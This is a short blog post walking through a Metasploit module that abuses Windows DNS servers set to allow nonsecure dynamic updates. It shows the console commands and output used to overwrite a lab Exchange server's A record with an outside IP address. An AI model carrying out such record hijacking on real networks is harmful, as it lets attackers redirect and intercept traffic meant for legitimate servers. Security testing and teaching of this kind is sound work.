Published: 25 Jun 2017 - 07:35 -0500
“Secure” DNS updates is the default in Windows, but there is an option to allow “Nonsecure” updates. I have seen this changed when non-Windows DHCP servers are used (eg Access Points), this opens a network up to some pretty nifty attacks that a Metasploit module just hit the ground for.
You can read up on the pull request in pr/#8599
Just to drive home the point I’ll be using my Exchange server as a target:
If you are going to be overwriting an existing record make sure to keep a note of the real IP address of the host you are overwriting so that you can fix the record afterwards.
$ dig @192.168.80.10 sdexchange.sittingduck.info ;; ANSWER SECTION: sdexchange.sittingduck.info. 1200 IN A 192.168.80.13
Here is what the module looks like:
msf > use auxiliary/admin/dns/dyn_dns_update msf auxiliary(dyn_dns_update) > show options Module options (auxiliary/admin/dns/dyn_dns_update): Name Current Setting Required Description ---- --------------- -------- ----------- CHOST no The source address to use for queries and updates DOMAIN yes The domain name HOSTNAME yes The name record you want to add IP no The IP you want to assign to the record RHOST yes The vulnerable DNS server IP address TYPE A yes The record type you want to add. (Accepted: A, AAAA, CNAME, TXT) VALUE no The string to be added with TXT or CNAME record Auxiliary action: Name Description ---- ----------- UPDATE Add or update a record. (default)
It has 3 different actions, but you’ll mostly want
UPDATE will automatically delete a record if it exists already and then add the record back with your specified settings.
msf auxiliary(dyn_dns_update) > show actions Auxiliary actions: Name Description ---- ----------- ADD Add a new record. Fail if it already exists. DELETE Delete an existing record. UPDATE Add or update a record. (default)
Here are the settings I chose. Notice the IP address that I’m injecting isn’t on the same subnet as the domain.
msf auxiliary(dyn_dns_update) > set DOMAIN sittingduck.info DOMAIN => sittingduck.info msf auxiliary(dyn_dns_update) > set HOSTNAME sdexchange HOSTNAME => sdexchange msf auxiliary(dyn_dns_update) > set IP 100.100.100.100 IP => 100.100.100.100 msf auxiliary(dyn_dns_update) > set RHOST 192.168.80.10 RHOST => 192.168.80.10
And the output:
msf auxiliary(dyn_dns_update) > run [+] Found existing A record for sdexchange.sittingduck.info [*] Sending dynamic DNS delete message... [+] The record 'sdexchange.sittingduck.info => 100.100.100.100' has been deleted! [*] Sending dynamic DNS add message... [+] The record 'sdexchange.sittingduck.info => 100.100.100.100' has been added! [*] Auxiliary module execution completed msf auxiliary(dyn_dns_update) >
This will stay until fixed or another dynamic DNS update is performed from the original server (every 24 hours or so).